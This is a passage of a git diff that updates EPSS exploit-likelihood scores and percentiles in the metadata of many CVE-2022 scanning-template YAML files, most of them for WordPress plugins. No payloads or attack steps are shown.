cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41124 + epss-percentile: 0.41202 cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 96f9ac4c16..0fa76aaab5 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0597 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.4485 + epss-percentile: 0.4495 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 73657928bf..aaa703f14a 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0599 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index e3b0201c12..fe75b25e15 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0651 cwe-id: CWE-89 epss-score: 0.34697 - epss-percentile: 0.96695 + epss-percentile: 0.96721 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index fb1835a792..aeb86ba38c 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0653 cwe-id: CWE-79 epss-score: 0.00206 - epss-percentile: 0.58358 + epss-percentile: 0.5852 cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 8ea2e67097..81b44218e2 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0656 cwe-id: CWE-552 - epss-score: 0.00671 - epss-percentile: 0.77483 + epss-score: 0.00684 + epss-percentile: 0.77881 cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index ce2298a562..effc35ccd8 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0658 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.9206 + epss-score: 0.03633 + epss-percentile: 0.90761 cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 7e32f5cd53..c10aefd726 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0660 cwe-id: CWE-209 epss-score: 0.00719 - epss-percentile: 0.78389 + epss-percentile: 0.78502 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index c3926f191d..1fbe28e1b4 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0678 cwe-id: CWE-79 - epss-score: 0.00147 - epss-percentile: 0.50512 + epss-score: 0.00143 + epss-percentile: 0.49958 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index a78f690b94..aff584cc3a 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0679 cwe-id: CWE-22 epss-score: 0.03099 - epss-percentile: 0.89991 + epss-percentile: 0.90037 cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 38c2e5898d..6e05b1eb64 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0692 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 3d254ebd82..834035d8b8 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0693 cwe-id: CWE-89 - epss-score: 0.01757 - epss-percentile: 0.86579 + epss-score: 0.04159 + epss-percentile: 0.91317 cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 27d5abe46e..294778c561 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0735 cwe-id: CWE-863 epss-score: 0.03278 - epss-percentile: 0.9025 + epss-percentile: 0.90311 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 4e4eab135d..a26f788447 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0747 cwe-id: CWE-89 epss-score: 0.03399 - epss-percentile: 0.90418 + epss-percentile: 0.9048 cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index a6ab300acb..4b33c7b30c 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0760 cwe-id: CWE-89 epss-score: 0.03399 - epss-percentile: 0.90418 + epss-percentile: 0.9048 cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 8d8c16f581..1e0d8a7afb 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0769 cwe-id: CWE-89 - epss-score: 0.01757 - epss-percentile: 0.86579 + epss-score: 0.04159 + epss-percentile: 0.91317 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 15cfea75fa..6231a73d54 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0773 cwe-id: CWE-89 - epss-score: 0.03032 - epss-percentile: 0.89885 + epss-score: 0.05057 + epss-percentile: 0.92125 cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 42ee55bdcc..11f71677e1 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0776 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: vendor: revealjs diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index cd56b781f0..c39056f52f 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0781 cwe-id: CWE-89 - epss-score: 0.01091 - epss-percentile: 0.82678 + epss-score: 0.01619 + epss-percentile: 0.86091 cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 9dbff39222..ddfc4bade6 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0784 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.9206 + epss-score: 0.03633 + epss-percentile: 0.90761 cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 6570a0c492..598620f1ea 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0785 cwe-id: CWE-89 epss-score: 0.05057 - epss-percentile: 0.9206 + epss-percentile: 0.92125 cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 307281cf83..a7c090e31f 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0786 cwe-id: CWE-89 - epss-score: 0.02409 - epss-percentile: 0.88753 + epss-score: 0.03032 + epss-percentile: 0.89931 cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 8cb116a61a..4f5537a8a2 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0787 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.9206 + epss-score: 0.03633 + epss-percentile: 0.90761 cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index e80c56e8d4..39f11c06c9 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0788 cwe-id: CWE-89 - epss-score: 0.02409 - epss-percentile: 0.88753 + epss-score: 0.03032 + epss-percentile: 0.89931 cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index d6b63df624..12c8c76ef4 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0814 cwe-id: CWE-89 - epss-score: 0.03032 - epss-percentile: 0.89885 + epss-score: 0.05057 + epss-percentile: 0.92125 cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index a4dc0b6481..8f55053d5e 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0817 cwe-id: CWE-89 - epss-score: 0.03032 - epss-percentile: 0.89885 + epss-score: 0.05057 + epss-percentile: 0.92125 cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 70201b2b5f..1051613ccf 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-0824 cwe-id: CWE-284,CWE-863 - epss-score: 0.9725 - epss-percentile: 0.99809 + epss-score: 0.97246 + epss-percentile: 0.99814 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 2a0df91e2d..6736765dd3 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0826 cwe-id: CWE-89 - epss-score: 0.03032 - epss-percentile: 0.89885 + epss-score: 0.05057 + epss-percentile: 0.92125 cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index a427e8b417..ab57ccb857 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0827 cwe-id: CWE-89 - epss-score: 0.02409 - epss-percentile: 0.88753 + epss-score: 0.03032 + epss-percentile: 0.89931 cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 3c7c205745..37b5e42d85 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0846 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.9206 + epss-score: 0.03633 + epss-percentile: 0.90761 cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 8030bd1dde..da9b39f1dc 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0864 cwe-id: CWE-79 epss-score: 0.00242 - epss-percentile: 0.61929 + epss-percentile: 0.62097 cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 7754c54fe4..409935fb6c 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0867 cwe-id: CWE-89 - epss-score: 0.07777 - epss-percentile: 0.93521 + epss-score: 0.09183 + epss-percentile: 0.94075 cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 3e792a44c7..728476d070 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0869 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.4485 + epss-percentile: 0.4495 cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index 92b3911eda..a2eb94e22c 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0870 cwe-id: CWE-918 epss-score: 0.00197 - epss-percentile: 0.57411 + epss-percentile: 0.57573 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index b2967ecc89..4757617584 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0885 cwe-id: CWE-862 - epss-score: 0.26868 - epss-percentile: 0.96297 + epss-score: 0.31455 + epss-percentile: 0.96571 cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 99cc2b25f4..d04895c96b 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0899 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45778 + epss-score: 0.00141 + epss-percentile: 0.49748 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 889dc179bf..b4ce47d6c9 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0928 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50048 + epss-percentile: 0.50156 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 8b30d5add2..4a674286fe 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0948 cwe-id: CWE-89 - epss-score: 0.03845 - epss-percentile: 0.90947 + epss-score: 0.04964 + epss-percentile: 0.92036 cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 7bbca60583..e3dd628544 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0949 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.9206 + epss-score: 0.03633 + epss-percentile: 0.90761 cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index 85db4303b8..06dc407a53 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-0952 cwe-id: CWE-352 - epss-score: 0.06923 - epss-percentile: 0.93208 + epss-score: 0.08361 + epss-percentile: 0.93782 cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 97a5b5ba91..e4a89abc24 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0954 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50048 + epss-percentile: 0.50156 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 0749d95257..297956266a 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0963 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50048 + epss-percentile: 0.50156 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 2903d95f13..75ca3ba401 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0968 cwe-id: CWE-190 epss-score: 0.00076 - epss-percentile: 0.31221 + epss-percentile: 0.3112 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index fda6ef806a..937511cfba 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1007 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 9af377290f..64a165a7d2 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1013 cwe-id: CWE-89 - epss-score: 0.01192 - epss-percentile: 0.83492 + epss-score: 0.02036 + epss-percentile: 0.87728 cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index 51e263df3e..a3c29879cd 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1020 cwe-id: CWE-352 - epss-score: 0.01434 - epss-percentile: 0.85073 + epss-score: 0.01578 + epss-percentile: 0.8591 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 7f08e24d22..e02ca67bc4 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1040 cwe-id: CWE-287 - epss-score: 0.97147 - epss-percentile: 0.99753 + epss-score: 0.97067 + epss-percentile: 0.99714 cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index c808eea68e..9acc2b7093 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.00292 - epss-percentile: 0.65683 + epss-percentile: 0.65845 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 57bc34e8c3..2ac86f2587 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1057 cwe-id: CWE-89 - epss-score: 0.02077 - epss-percentile: 0.87831 + epss-score: 0.02409 + epss-percentile: 0.88812 cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index a529436980..bbe3f5a430 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1058 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 542c49c89d..eec294fbe9 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - epss-score: 0.45912 - epss-percentile: 0.97071 + epss-score: 0.42222 + epss-percentile: 0.96983 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 43c8697e5e..38fad0629c 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1162 cwe-id: CWE-798 epss-score: 0.19954 - epss-percentile: 0.95838 + epss-percentile: 0.95889 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index ca221f213e..e3e11d1fe6 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1168 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 4cb0c2fcf3..38e9a4e690 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-1170 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:nootheme:jobmonster:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index ed2d5da606..671b495f9d 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1221 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46172 + epss-score: 0.00106 + epss-percentile: 0.42838 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index 38bb797286..7b1ddec757 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 